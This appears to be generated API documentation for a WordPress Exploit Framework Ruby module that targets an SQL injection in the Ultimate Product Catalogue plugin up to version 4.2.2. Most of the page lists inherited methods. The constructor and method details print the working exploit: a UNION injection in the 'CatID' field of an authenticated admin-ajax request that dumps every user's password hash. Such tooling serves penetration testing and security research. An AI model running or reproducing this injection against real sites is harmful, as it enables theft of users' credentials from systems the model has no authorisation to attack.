Class: Wpxf::Auxiliary::UltimateProductCatalogueHashDump

Inherits:

Module

• Object
• Module
• Wpxf::Auxiliary::UltimateProductCatalogueHashDump

Includes:

WordPress::HashDump

Defined in:

lib/wpxf/modules/auxiliary/hash_dump/ultimate_product_catalogue_hash_dump.rb

Constant Summary

Constants included from WordPress::Options

WordPress::Options::WP_OPTION_CONTENT_DIR

Constants included from Net::HttpOptions

Net::HttpOptions::HTTP_OPTION_BASIC_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_CLIENT_TIMEOUT, Net::HttpOptions::HTTP_OPTION_FOLLOW_REDIRECT, Net::HttpOptions::HTTP_OPTION_HOST, Net::HttpOptions::HTTP_OPTION_HOST_VERIFICATION, Net::HttpOptions::HTTP_OPTION_MAX_CONCURRENCY, Net::HttpOptions::HTTP_OPTION_PEER_VERIFICATION, Net::HttpOptions::HTTP_OPTION_PORT, Net::HttpOptions::HTTP_OPTION_PROXY, Net::HttpOptions::HTTP_OPTION_PROXY_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_SSL, Net::HttpOptions::HTTP_OPTION_TARGET_URI, Net::HttpOptions::HTTP_OPTION_USER_AGENT, Net::HttpOptions::HTTP_OPTION_VHOST

Instance Attribute Summary

Attributes inherited from Module

#active_workspace, #event_emitter, #payload, #session_cookie

Attributes included from Options

#datastore, #options

Instance Method Summary

• #check ⇒ Object
• #hashdump_number_of_cols ⇒ Object
• #hashdump_request_body ⇒ Object
• #hashdump_request_method ⇒ Object
• #hashdump_request_params ⇒ Object
• #hashdump_visible_field_index ⇒ Object
• #initialize ⇒ UltimateProductCatalogueHashDump constructor

  A new instance of UltimateProductCatalogueHashDump.

• #requires_authentication ⇒ Object
• #vulnerable_url ⇒ Object

Methods included from WordPress::HashDump

#export_path, #hashdump_custom_union_values, #hashdump_prefix_fingerprint_statement, #hashdump_sql_statement, #reveals_one_row_per_request, #run, #table_prefix

Methods included from Wpxf

app_path, build_module_list, change_stdout_sync, custom_modules_path, data_directory, databases_path, gemspec, home_directory, load_custom_modules, load_module, modules_path, payloads_path, version

Methods inherited from Module

#aux_module?, #can_execute?, #check_wordpress_and_online, #cleanup, #exploit_module?, #missing_options, #run, #set_option_value, #unset_option

Methods included from Db::Credentials

#store_credentials

Methods included from ModuleAuthentication

#authenticate_with_wordpress

Methods included from WordPress::Urls

#wordpress_url_admin, #wordpress_url_admin_ajax, #wordpress_url_admin_options, #wordpress_url_admin_post, #wordpress_url_admin_profile, #wordpress_url_admin_update, #wordpress_url_atom, #wordpress_url_author, #wordpress_url_comments_post, #wordpress_url_login, #wordpress_url_new_user, #wordpress_url_opml, #wordpress_url_plugin_install, #wordpress_url_plugin_upload, #wordpress_url_plugins, #wordpress_url_post, #wordpress_url_rdf, #wordpress_url_readme, #wordpress_url_rest_api, #wordpress_url_rss, #wordpress_url_sitemap, #wordpress_url_themes, #wordpress_url_uploads, #wordpress_url_wp_content, #wordpress_url_xmlrpc

Methods included from WordPress::Options

#wp_content_dir

Methods included from WordPress::Login

#valid_wordpress_cookie?, #wordpress_login, #wordpress_login_post_body

Methods included from WordPress::Fingerprint

#check_plugin_version_from_changelog, #check_plugin_version_from_readme, #check_theme_version_from_readme, #check_theme_version_from_style, #check_version_from_custom_file, #wordpress_and_online?, #wordpress_version

Methods included from Net::HttpClient

#base_http_headers, #base_uri, #download_file, #execute_delete_request, #execute_get_request, #execute_post_request, #execute_put_request, #execute_queued_requests, #execute_request, #full_uri, #initialize_advanced_options, #initialize_options, #max_http_concurrency, #normalize_relative_uri, #normalize_uri, #queue_request, #target_host, #target_port, #target_uri

Methods included from Net::TyphoeusHelper

#advanced_typhoeus_options, #create_typhoeus_request, #create_typhoeus_request_options, #standard_typhoeus_options

Methods included from Net::UserAgent

#clients_by_frequency, #random_browser_and_os, #random_chrome_platform_string, #random_firefox_platform_string, #random_firefox_version_string, #random_iexplorer_platform_string, #random_opera_platform_string, #random_processor_string, #random_safari_platform_string, #random_time_string, #random_user_agent

Methods included from Versioning::OSVersions

#random_nt_version, #random_osx_version

Methods included from Versioning::BrowserVersions

#random_chrome_build_number, #random_chrome_version, #random_ie_version, #random_opera_version, #random_presto_version, #random_presto_version2, #random_safari_build_number, #random_safari_version, #random_trident_version

Methods included from Options

#all_options_valid?, #get_option, #get_option_value, #missing_options, #normalized_option_value, #option_valid?, #option_value?, #register_advanced_options, #register_evasion_options, #register_option, #register_options, #scoped_option_change, #set_option_value, #unregister_option, #unset_option

Methods included from OutputEmitters

#emit_error, #emit_info, #emit_success, #emit_table, #emit_warning

Methods included from ModuleInfo

#emit_usage_info, #module_author, #module_date, #module_desc, #module_description_preformatted, #module_name, #module_references, #update_info

Constructor Details

#initialize ⇒ UltimateProductCatalogueHashDump

Returns a new instance of UltimateProductCatalogueHashDump.

# File 'lib/wpxf/modules/auxiliary/hash_dump/ultimate_product_catalogue_hash_dump.rb', line 6

def initialize
  super

  update_info(
    name: 'Ultimate Product Catalogue <= 4.2.2 Authenticated Hash Dump',
    desc: %(
      Ultimate Product Catalogue <= 4.2.2 contains an SQL injection vulnerability
      which can be leveraged by all users with at least subscriber status. This
      module utilises this vulnerability to dump the hashed passwords of all
      users in the database.
    ),
    author: [
      'Lenon Leite', # Disclosure
      'rastating'    # WPXF module
    ],
    references: [
      ['WPVDB', '8853'],
      ['URL', 'http://lenonleite.com.br/en/blog/2017/05/31/english-ultimate-product-catalogue-4-2-2-sql-injection/']
    ],
    date: 'Jun 26 2017'
  )
end

Instance Method Details

#check ⇒ Object

# File 'lib/wpxf/modules/auxiliary/hash_dump/ultimate_product_catalogue_hash_dump.rb', line 29

def check
  check_plugin_version_from_changelog('ultimate-product-catalogue', 'readme.txt', '4.2.3')
end

#hashdump_number_of_cols ⇒ Object

# File 'lib/wpxf/modules/auxiliary/hash_dump/ultimate_product_catalogue_hash_dump.rb', line 53

def hashdump_number_of_cols
  2
end

#hashdump_request_body ⇒ Object

# File 'lib/wpxf/modules/auxiliary/hash_dump/ultimate_product_catalogue_hash_dump.rb', line 45

def hashdump_request_body
  { 'CatID' => "0 UNION #{hashdump_sql_statement}" }
end

#hashdump_request_method ⇒ Object

# File 'lib/wpxf/modules/auxiliary/hash_dump/ultimate_product_catalogue_hash_dump.rb', line 37

def hashdump_request_method
  :post
end

#hashdump_request_params ⇒ Object

# File 'lib/wpxf/modules/auxiliary/hash_dump/ultimate_product_catalogue_hash_dump.rb', line 41

def hashdump_request_params
  { 'action' => 'get_upcp_subcategories' }
end

#hashdump_visible_field_index ⇒ Object

# File 'lib/wpxf/modules/auxiliary/hash_dump/ultimate_product_catalogue_hash_dump.rb', line 49

def hashdump_visible_field_index
  0
end

#requires_authentication ⇒ Object

# File 'lib/wpxf/modules/auxiliary/hash_dump/ultimate_product_catalogue_hash_dump.rb', line 33

def requires_authentication
  true
end

#vulnerable_url ⇒ Object

# File 'lib/wpxf/modules/auxiliary/hash_dump/ultimate_product_catalogue_hash_dump.rb', line 57

def vulnerable_url
  wordpress_url_admin_ajax
end